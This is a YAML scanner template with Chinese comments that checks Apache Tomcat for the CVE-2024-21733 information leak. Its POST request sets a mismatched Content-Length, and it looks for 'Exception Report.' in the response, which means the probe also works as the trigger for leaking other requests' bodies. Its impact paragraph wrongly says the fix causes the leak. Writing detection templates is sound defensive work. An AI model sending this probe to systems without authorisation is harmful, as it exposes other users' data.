39 lines
1.6 KiB
YAML
39 lines
1.6 KiB
YAML
|
keyword: Tomcat
|
|||
|
name: Tomcat信息泄露漏洞
|
|||
|
description: | # 下一行可填写漏洞描述
|
|||
|
Apache Tomcat 信息泄露漏洞(CVE-2024-21733)情报。Apache Tomcat 是一个开源 Java Servlet 容器和 Web 服务器,用于运行 Java 应用程序和动态网页。
|
|||
|
requests: # 为空代表默认或者不启用
|
|||
|
path: "/"
|
|||
|
method: POST
|
|||
|
headers:
|
|||
|
"Sec-Ch-Ua": '"Chromium";v="119", "Not?A_Brand";v="24"'
|
|||
|
"Sec-Ch-Ua-Mobile": '?0'
|
|||
|
"Sec-Ch-Ua-Platform": "Linux"
|
|||
|
"Upgrade-Insecure-Requests": "1"
|
|||
|
"Sec-Fetch-Site": "none"
|
|||
|
"Sec-Fetch-Mode": "navigate"
|
|||
|
"Sec-Fetch-User": '?1'
|
|||
|
"Sec-Fetch-Dest": "document"
|
|||
|
"Accept-Encoding": "gzip, deflate, br"
|
|||
|
"Accept-Language": "en-US,en;q=0.9"
|
|||
|
"Priority": "u=0, i"
|
|||
|
"Connection": "keep-alive"
|
|||
|
"Content-Type": "application/x-www-form-urlencoded"
|
|||
|
"Content-Length": "100"
|
|||
|
body-raw: |- # 如果需要发送请求体,在下一行开始填写
|
|||
|
X
|
|||
|
|
|||
|
response:
|
|||
|
path: "" # 不填则默认接收此请求的响应包
|
|||
|
status-code: 200
|
|||
|
body: "Exception Report." # 此处可填写响应体中确认漏洞存在的关键字或者其他信息
|
|||
|
time: # 此处填写响应包响应时间,默认不启用
|
|||
|
headers:
|
|||
|
Server:
|
|||
|
Content-type:
|
|||
|
Content-length:
|
|||
|
Date:
|
|||
|
Connection:
|
|||
|
impact: | # 下一行可填写漏洞影响
|
|||
|
Coyote 是 Tomcat 的连接器,处理来自客户端的请求并将它们传递Tomcat 引擎进行处理。攻击者可以通过构造特定请求,在异常页面中输出其他请求的body 数据,修复版本中通过增加 finally 代码块,保证默认会重设缓冲区 position 和 limit 到一致的状态,从而造成信息泄露。
|